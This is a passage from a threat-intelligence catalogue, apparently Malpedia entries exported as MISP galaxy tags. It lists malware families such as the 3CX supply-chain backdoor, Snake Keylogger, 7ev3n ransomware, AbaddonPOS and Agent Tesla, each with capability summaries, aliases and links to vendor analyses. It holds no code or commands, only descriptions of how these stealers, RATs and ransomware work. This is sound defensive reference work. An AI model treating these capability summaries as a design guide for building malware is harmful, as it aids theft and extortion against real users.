https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_004

https://lab52.io/blog/muddywaters-light-first-stager-targetting-middle-east/

VBREVSHELL

According to Mandiant, VBREVSHELL is a VBA macro that spawns a reverse shell relying exclusively on Windows API calls.

The tag is: misp-galaxy:malpedia="VBREVSHELL"

VBREVSHELL is also known as:

Table 2821. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/vbs.vbrevshell

https://www.mandiant.com/media/17826

https://www.linkedin.com/feed/update/urn:li:activity:7137086303329783808/

https://socradar.io/dark-web-profile-apt42-iranian-cyber-espionage-group/

000Stealer

The tag is: misp-galaxy:malpedia="000Stealer"

000Stealer is also known as:

Table 2824. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.000stealer

https://twitter.com/3xp0rtblog/status/1509978637189419008

3CX Backdoor (Windows)

According to CrowdStrike, this backdoor was discovered being embedded in a legitimate, signed version of 3CXDesktopApp, and thus constitutes a supply chain attack.

The tag is: misp-galaxy:malpedia="3CX Backdoor (Windows)"

3CX Backdoor (Windows) is also known as:

  • SUDDENICON

Table 2825. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.3cx_backdoor

https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/

https://blog.cyble.com/2023/03/31/a-comprehensive-analysis-of-the-3cx-attack

https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf

https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack

https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/

https://www.rapid7.com/blog/post/2023/03/30/backdoored-3cxdesktopapp-installer-used-in-active-threat-campaign/

https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/

https://securelist.com/it-threat-evolution-q2-2023/110355/

https://www.fortinet.com/blog/threat-research/3cx-desktop-app-compromised

https://www.elastic.co/security-labs/elastic-users-protected-from-suddenicon-supply-chain-attack

https://www.cadosecurity.com/forensic-triage-of-a-windows-system-running-the-backdoored-3cx-desktop-app/

https://www.trendmicro.com/en_us/research/23/c/information-on-attacks-involving-3cx-desktop-app.html

https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/

https://blogs.vmware.com/security/2023/03/investigating-3cx-desktop-application-attacks-what-you-need-to-know.html

https://github.com/dodo-sec/Malware-Analysis/blob/main/SmoothOperator/SmoothOperator.md

https://www.group-ib.com/blog/3cx-supply-chain-attack/?utm_source=twitter&utm_campaign=3cx-blog&utm_medium=social

https://blogs.blackberry.com/en/2023/03/initial-implants-and-network-analysis-suggest-the-3cx-supply-chain-operation-goes-back-to-fall-2022

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3cx-supply-chain-attack

https://www.youtube.com/watch?v=fTX-vgSEfjk

https://www.zscaler.com/security-research/3CX-supply-chain-attack-analysis-march-2023

https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats

https://www.splunk.com/en_us/blog/security/splunk-insights-investigating-the-3cxdesktopapp-supply-chain-compromise.html

https://www.reversinglabs.com/blog/red-flags-fly-over-supply-chain-compromised-3cx-update

https://research.openanalysis.net/3cx/northkorea/apt/triage/2023/03/30/3cx-malware.html#Functionality

404 Keylogger

Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim’s sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.

The tag is: misp-galaxy:malpedia="404 Keylogger"

404 Keylogger is also known as:

  • 404KeyLogger

  • Snake Keylogger

Table 2826. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

https://threatresearch.ext.hp.com/pdf-malware-is-not-yet-dead/

https://blogs.blackberry.com/en/2022/06/threat-thursday-unique-delivery-method-for-snake-keylogger

https://any.run/cybersecurity-blog/analyzing-snake-keylogger/

https://cert.gov.ua/article/955924

https://habr.com/ru/company/group-ib/blog/477198/

https://www.ciphertechsolutions.com/roboski-global-recovery-automation/

https://x-junior.github.io/malware%20analysis/2022/06/24/Snakekeylogger.html

https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence—​102

https://twitter.com/James_inthe_box/status/1401921257109561353

https://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware

https://securityintelligence.com/posts/roboski-global-recovery-automation/

https://malwarebookreports.com/cross-platform-java-dropper-snake-and-xloader-mac-version/

https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf

https://www.cybereason.com/blog/threat-analysis-report-snake-infostealer-malware

https://www.youtube.com/watch?v=vzyJp2w8bPE

https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence—​89

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord

https://www.bleepingcomputer.com/news/security/pdf-smuggles-microsoft-word-doc-to-drop-snake-keylogger-malware/

https://threatresearch.ext.hp.com/the-many-skins-of-snake-keylogger/

https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/

https://blog.netlab.360.com/purecrypter

https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter

7ev3n

The NJCCIC describes 7ev3n as a ransomware "that targets the Windows OS and spreads via spam emails containing malicious attachments, as well as file sharing networks. It installs multiple files in the LocalAppData folder, each of which controls different functions including disabling bootup recovery options, deleting the ransomware installation file, encrypting data, and gaining administrator privileges. This variant also adds registry keys that disables various Windows function keys such as F1, F3, F4, F10, Alt, Num Lock, Ctrl, Enter, Escape, Shift, and Tab. Files encrypted by 7ev3n are labeled with a .R5A extension. It also locks victims out of Windows recovery options making it challenging to repair the damage done by 7ev3n."

The tag is: misp-galaxy:malpedia="7ev3n"

7ev3n is also known as:

Table 2829. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.7ev3n

https://www.cyber.nj.gov/threat-profiles/ransomware-variants/7ev3n

https://blog.malwarebytes.com/threat-analysis/2016/05/7ev3n-ransomware/

8Base

The 8Base ransomware group has remained relatively unknown despite the massive spike in activity in Summer of 2023. The group utilizes encryption paired with “name-and-shame” techniques to compel their victims to pay their ransoms. 8Base has an opportunistic pattern of compromise with recent victims spanning across varied industries. Despite the high amount of compromises, the information regarding identities, methodology, and underlying motivation behind these incidents still remains a mystery. Samples of their ransomware show they are using customized Phobos with SmokeLoader.

The tag is: misp-galaxy:malpedia="8Base"

8Base is also known as:

Table 2830. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.8base

https://socradar.io/dark-web-profile-8base-ransomware/

https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/

https://blog.talosintelligence.com/deep-dive-into-phobos-ransomware/

https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player.html

https://twitter.com/rivitna2/status/1674718854549831681

https://www.logpoint.com/en/blog/emerging-threat/defending-against-8base/

https://krebsonsecurity.com/2023/09/whos-behind-the-8base-ransomware-website/

https://www.acronis.com/en-sg/cyber-protection-center/posts/8base-ransomware-stays-unseen-for-a-year/

https://blog.bushidotoken.net/2023/05/unmasking-ransomware-using-stylometric.html

8.t Dropper

8T_Dropper has been used by Chinese threat actor TA428 in order to install Cotx RAT onto victim’s machines during Operation LagTime IT. According to Proofpoint the attack was developed against a number of government agencies in East Asia overseeing government information technology, domestic affairs, foreign affairs, economic development, and political processes. The dropper was delivered through an RTF document exploiting CVE-2018-0798.

The tag is: misp-galaxy:malpedia="8.t Dropper"

8.t Dropper is also known as:

  • 8t_dropper

  • RoyalRoad

Table 2831. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.8t_dropper

https://medium.com/@Ilandu/portdoor-malware-afc9d0796cba

https://vb2020.vblocalhost.com/uploads/VB2020-20.pdf

https://go.recordedfuture.com/hubfs/reports/cta-2022-0922.pdf

https://tradahacking.vn/l%C3%A0-1937cn-hay-oceanlotus-hay-lazarus-6ca15fe1b241

https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign

https://www.sentinelone.com/labs/targets-of-interest-russian-organizations-increasingly-under-attack-by-chinese-apts/

https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/

https://community.riskiq.com/article/5fe2da7f

https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf

https://nao-sec.org/2021/01/royal-road-redive.html

https://malgamy.github.io/malware-analysis/The-Approach-of-TA413-for-Tibetan-Targets/#third-stage

https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/

https://medium.com/@Sebdraven/malicious-document-targets-vietnamese-officials-acb3b9d8b80a

https://community.riskiq.com/article/56fa1b2f

https://research.checkpoint.com/2023/pandas-with-a-soul-chinese-espionage-attacks-against-southeast-asian-government-entities/

https://tradahacking.vn/another-malicious-document-with-cve-2017-11882-839e9c0bbf2f

https://www.accenture.com/_acnmedia/pdf-96/accenture-security-mudcarp.pdf

https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-attribution-object-using-rtf-object-dimensions-track-apt-phishing-weaponizers/

https://medium.com/@Sebdraven/new-version-of-chinoxy-backdoor-using-covid19-document-lure-83fa294c0746

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology

https://blog.malwarelab.pl/posts/on_the_royal_road/

https://medium.com/@Sebdraven/malicious-document-targets-vietnamese-officials-acb3b9d8b80a?

https://securelist.com/cycldek-bridging-the-air-gap/97157/

https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf

9002 RAT

9002 RAT is a Remote Access Tool typically observed to be used by an APT to control a victim’s machine. It has been spread over via zero day exploits (e.g. targeting Internet Explorer) as well as via email attachments. The infection chain starts by opening a .LNK (an OLE packager shell object) that executes a Powershell command.

The tag is: misp-galaxy:malpedia="9002 RAT"

9002 RAT is also known as:

  • HOMEUNIX

  • Hydraq

  • McRAT

Table 2832. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.9002

https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn

https://blog.trendmicro.com/trendlabs-security-intelligence/supply-chain-attack-operation-red-signature-targets-south-korean-organizations/

http://researchcenter.paloaltonetworks.com/2016/07/unit-42-attack-delivers-9002-trojan-through-google-drive/

https://www.secureworks.com/research/threat-profiles/bronze-express

https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html

https://www.secureworks.com/research/threat-profiles/bronze-keystone

https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf

https://www.infopoint-security.de/medien/the-elderwood-project.pdf

https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/

https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures

https://attack.mitre.org/groups/G0001/

https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html

https://www.fireeye.com/blog/threat-research/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html

https://www.secureworks.com/research/threat-profiles/bronze-union

https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/hidden_lynx.pdf

https://www.secureworks.com/research/threat-profiles/bronze-firestone

https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/elderwood-project-12-en.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats

Abaddon

Uses Discord as C&C, has ransomware feature.

The tag is: misp-galaxy:malpedia="Abaddon"

Abaddon is also known as:

Table 2833. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon

https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/

AbaddonPOS

MajorGeeks describes this malware as trying to locate credit card data by reading the memory of all processes except itself by first blacklisting its own PID using the GetCurrentProcessId API. Once that data is discovered, it sends this data back to a command and control server using a custom binary protocol instead of HTTP.

The tag is: misp-galaxy:malpedia="AbaddonPOS"

AbaddonPOS is also known as:

  • PinkKite

  • TinyPOS

Table 2834. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon_pos

https://www.carbonblack.com/2020/05/21/tau-technical-report-new-attack-combines-tinypos-with-living-off-the-land-techniques-for-scraping-credit-card-data/

https://medium.com/s2wlab/operation-synctrek-e5013df8d167

https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak

https://threatpost.com/new-pos-malware-pinkkite-takes-flight/130428/

https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software

https://norfolkinfosec.com/tinypos-and-prolocker-an-odd-relationship/

abantes

The tag is: misp-galaxy:malpedia="abantes"

abantes is also known as:

Table 2835. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.abantes

Abbath Banker

The tag is: misp-galaxy:malpedia="Abbath Banker"

Abbath Banker is also known as:

Table 2836. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.abbath_banker

AbSent Loader

The tag is: misp-galaxy:malpedia="AbSent Loader"

AbSent Loader is also known as:

Table 2837. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.absentloader

https://github.com/Tlgyt/AbSent-Loader

https://twitter.com/cocaman/status/1260069549069733888

ACBackdoor (Windows)

A Linux backdoor that was apparently ported to Windows. This entry represents the Windows version. It appears the Linux version was written first and the Windows version was ported later, without full functionality. The Linux version offers persistence as well as some process manipulation techniques, though both versions apparently offer the ability to access the command line and execute programs as well as self-update.

The tag is: misp-galaxy:malpedia="ACBackdoor (Windows)"

ACBackdoor (Windows) is also known as:

Table 2838. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.acbackdoor

https://www.bleepingcomputer.com/news/security/linux-windows-users-targeted-with-new-acbackdoor-malware/

ACEHASH

ACEHASH is described by FireEye as combined credential harvester that consists of two components, a loader and encrypted/compressed payload. To execute, a password is necessary (e.g. 9839D7F1A0) and the individual modules are addressed with parameters (-m, -w, -h).

The tag is: misp-galaxy:malpedia="ACEHASH"

ACEHASH is also known as:

Table 2839. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.acehash

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://www.secureworks.com/research/threat-profiles/bronze-atlas

https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/

https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html

AcidBox

Unit42 found AcidBox in February 2019 and describes it as a malware family used by an unknown threat actor in 2017 against Russian entities, as stated by Dr.Web. It reused and improved an exploit for VirtualBox previously used by Turla. The malware itself is a modular toolkit, featuring both usermode and kernelmode components and anti-analysis techniques such as stack-based string obfuscation or dynamic XOR-encoded API usage.

The tag is: misp-galaxy:malpedia="AcidBox"

AcidBox is also known as:

  • MagicScroll

Table 2840. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.acidbox

https://blog.talosintelligence.com/2020/08/attribution-puzzle.html

https://unit42.paloaltonetworks.com/acidbox-rare-malware/

https://securelist.com/apt-trends-report-q2-2020/97937/

https://www.epicturla.com/blog/acidbox-clustering

AcridRain

AcridRain is a password stealer written in C/C++. This malware can steal credentials, cookies, credit cards from multiple browsers. It can also dump Telegram and Steam sessions, rob Filezilla recent connections, and more.

The tag is: misp-galaxy:malpedia="AcridRain"

AcridRain is also known as:

Table 2841. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.acridrain

https://thisissecurity.stormshield.com/2018/08/28/acridrain-stealer/

Acronym

The tag is: misp-galaxy:malpedia="Acronym"

Acronym is also known as:

Table 2842. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.acronym

Adamantium Thief

The tag is: misp-galaxy:malpedia="Adamantium Thief"

Adamantium Thief is also known as:

Table 2844. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.adamantium_thief

https://twitter.com/ClearskySec/status/1377176015189929989

https://github.com/LimerBoy/Adamantium-Thief

AdamLocker

Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim’s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.

The tag is: misp-galaxy:malpedia="AdamLocker"

AdamLocker is also known as:

Table 2845. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.adam_locker

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-dec-19-dec-31-2016

https://twitter.com/JaromirHorejsi/status/813712587997249536

Adhubllka

Some Ransomware distributed by TA547 in Australia

The tag is: misp-galaxy:malpedia="Adhubllka"

Adhubllka is also known as:

Table 2846. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.adhubllka

https://www.proofpoint.com/us/blog/security-briefs/ta547-pivots-ursnif-banking-trojan-ransomware-australian-campaign

AdvisorsBot

AdvisorsBot is a downloader named after early command and control domains that all contained the word "advisors". The malware is written in C and employs a number of anti-analysis features such as junk code, stack strings and Windows API function hashing.

The tag is: misp-galaxy:malpedia="AdvisorsBot"

AdvisorsBot is also known as:

Table 2848. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.advisorsbot

https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-2-advisorsbot

https://www.bromium.com/second-stage-attack-analysis/

AESRT

Ransomware written using .NET.

The tag is: misp-galaxy:malpedia="AESRT"

AESRT is also known as:

Table 2850. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.aesrt

https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-vohuk-scarecrow-and-aerst-variants

Agent.BTZ

The tag is: misp-galaxy:malpedia="Agent.BTZ"

Agent.BTZ is also known as:

  • ComRAT

  • Minit

  • Sun rootkit

Table 2853. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_btz

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303a

http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html

https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf

http://www.intezer.com/new-variants-of-agent-btz-comrat-found/

https://securelist.com/shedding-skin-turlas-fresh-faces/88069/

http://www.intezer.com/new-variants-of-agent-btz-comrat-found-part-2/

https://unit42.paloaltonetworks.com/ironnetinjector/

https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf

https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf

https://cdn.muckrock.com/foia_files/2021/02/16/21R019_RESPONSE.pdf

https://docs.broadcom.com/doc/waterbug-attack-group

https://blog.gdata.de/2015/01/23779-weiterentwicklung-anspruchsvoller-spyware-von-agent-btz-zu-comrat

https://ryancor.medium.com/deobfuscating-powershell-malware-droppers-b6c34499e41d

https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-129a

https://artemonsecurity.com/snake_whitepaper.pdf

https://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/

https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.secureworks.com/research/threat-profiles/iron-hunter

https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf

https://www.msreverseengineering.com/blog/2020/8/31/an-exhaustively-analyzed-idb-for-comrat-v4

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html

https://securelist.com/blog/virus-watch/58551/agent-btz-a-source-of-inspiration/

Agent Tesla

A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host’s clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.

The tag is: misp-galaxy:malpedia="Agent Tesla"

Agent Tesla is also known as:

  • AgenTesla

  • AgentTesla

  • Negasteal

Table 2854. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

https://www.secureworks.com/research/darktortilla-malware-analysis

https://twitter.com/MsftSecIntel/status/1392219299696152578

https://asec.ahnlab.com/ko/29133/

https://news.sophos.com/en-us/2021/02/02/agent-tesla-amps-up-information-stealing-attacks/

https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns

https://youtu.be/hxaeWyK8gMI

https://guillaumeorlando.github.io/AgentTesla

https://isc.sans.edu/forums/diary/AgentTesla+Delivered+via+a+Malicious+PowerPoint+AddIn/26162/

https://www.telsy.com/download/4832/

https://mrt4ntr4.github.io/How-Analysing-an-AgentTesla-Could-Lead-To-Attackers-Inbox-1/

https://lab52.io/blog/a-twisted-malware-infection-chain/

https://www.bleepingcomputer.com/news/security/russia-ukraine-war-exploited-as-lure-for-malware-distribution/

https://embee-research.ghost.io/agenttesla-full-analysis-api-hashing/

https://community.riskiq.com/article/40000d46

https://www.logpoint.com/en/blog/agentteslas-capabilities-review-detection-strategies/

https://blog.qualys.com/vulnerabilities-threat-research/2022/02/02/catching-the-rat-called-agent-tesla

https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/

https://mp.weixin.qq.com/s/X0kAIHOSldiFDthb4IsmbQ

https://www.netskope.com/blog/infected-powerpoint-files-using-cloud-services-to-deliver-multiple-malware

https://securelist.com/agent-tesla-malicious-spam-campaign/107478/

https://malwarebreakdown.com/2018/01/11/malspam-entitled-invoice-attched-for-your-reference-delivers-agent-tesla-keylogger/

https://www.vmray.com/cyber-security-blog/threat-bulletin-agent-tesla/

http://blog.nsfocus.net/sweed-611/

https://team-cymru.com/blog/2022/07/12/an-analysis-of-infrastructure-linked-to-the-hagga-threat-actor

https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://blog.netlab.360.com/purecrypter-is-busy-pumping-out-various-malicious-malware-families/

https://www.inde.nz/blog/inside-agenttesla

https://isc.sans.edu/forums/diary/PowerPoint+attachments+Agent+Tesla+and+code+reuse+in+malware/28154/

https://yoroi.company/research/serverless-infostealer-delivered-in-est-european-countries/

https://labs.sentinelone.com/agent-tesla-old-rat-uses-new-tricks-to-stay-on-top/

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout

https://blogs.blackberry.com/en/2021/06/threat-thursday-agent-tesla-infostealer-malware

https://research.openanalysis.net/dotnet/xorstringsnet/agenttesla/2023/04/16/xorstringsnet.html

https://www.youtube.com/watch?v=Q9_1xNbVQPY

https://blog.netlab.360.com/purecrypter

https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf

https://forensicitguy.github.io/agenttesla-vba-certutil-download/

https://www.seqrite.com/blog/gorgon-apt-targeting-msme-sector-in-india/

https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/negasteal-uses-hastebin-for-fileless-delivery-of-crysis-ransomware

https://inquest.net/blog/2021/11/02/adults-only-malware-lures

https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya

https://blogs.juniper.net/en-us/security/aggah-malware-campaign-expands-to-zendesk-and-github-to-host-its-malware

https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html

https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html

https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware

https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html

https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols

https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader

https://www.denexus.io/wp-content/uploads/2021/02/Threat-actor-targeting-gas-oil-supply-chains_public.pdf

http://ropgadget.com/posts/originlogger.html

http://www.secureworks.com/research/threat-profiles/gold-galleon

https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr

https://researchcenter.paloaltonetworks.com/2017/09/unit42-analyzing-various-layers-agentteslas-packing/

https://securityintelligence.com/posts/roboski-global-recovery-automation/

https://unit42.paloaltonetworks.com/originlogger/

https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire

https://youtu.be/QQuRp7Qiuzg

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord?

https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html

https://blog.malwarebytes.com/threat-intelligence/2022/05/nigerian-tesla-419-scammer-gone-malware-distributor-unmasked/

https://blog.talosintelligence.com/ipfs-abuse/

https://blog.minerva-labs.com/preventing-agenttesla

https://menshaway.blogspot.com/2021/04/agenttesla-malware.html

https://www.cisecurity.org/insights/blog/top-10-malware-march-2022

https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/

https://forensicitguy.github.io/a-tale-of-two-dropper-scripts/

https://cofense.com/strategic-analysis-agent-tesla-expands-targeting-and-networking-capabilities/

https://community.riskiq.com/article/56e28880

https://cert.gov.ua/article/861292

https://isc.sans.edu/diary/27666

https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/

https://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant

https://malwr-analysis.com/2020/04/05/trojan-agent-tesla-malware-analysis/

https://medium.com/@mariohenkel/decrypting-agenttesla-strings-and-config-b9000b18c996?sk=fcead9538516eeb3daa7b53cb537f6f4

https://mrt4ntr4.github.io/How-Analysing-an-AgentTesla-Could-Lead-To-Attackers-Inbox-2/

https://www.zscaler.com/blogs/research/agent-tesla-keylogger-delivered-using-cybersquatting

https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf

https://isc.sans.edu/diary/rss/27092

https://www.hornetsecurity.com/en/threat-research/vba-purging-malspam-campaigns/

https://www.proofpoint.com/us/blog/threat-insight/dtpacker-net-packer-curious-password-1

https://threatresearch.ext.hp.com/aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer/

https://youtu.be/7AifHTCldZI

https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/

https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update

https://www.telsy.com/wp-content/uploads/ATR_82599-1.pdf

https://www.bitdefender.com/blog/hotforsecurity/bitdefender-labs-sees-increased-malicious-and-scam-activity-exploiting-the-war-in-ukraine

https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/

http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/

https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html

https://us-cert.cisa.gov/ncas/alerts/aa20-345a

https://blog.malwarelab.pl/posts/basfu_aggah/

https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/

https://unit42.paloaltonetworks.com/malicious-compiled-html-help-file-agent-tesla/

https://yoroi.company/research/office-documents-may-the-xll-technique-change-the-threat-landscape-in-2022/

https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/

https://guillaumeorlando.github.io/GorgonInfectionchain

https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html

https://www.secureworks.com/research/threat-profiles/gold-galleon

https://isc.sans.edu/diary/28202

https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/

https://www.elastic.co/security-labs/attack-chain-leads-to-xworm-and-agenttesla

https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/

https://www.fortinet.com/blog/threat-research/fake-purchase-order-used-to-deliver-agent-tesla

https://blog.malwarebytes.com/cybercrime/2020/04/new-agenttesla-variant-steals-wifi-credentials/

https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads

https://www.splunk.com/en_us/blog/security/inside-the-mind-of-a-rat-agent-tesla-detection-and-analysis.html

https://youtu.be/BM38OshcozE

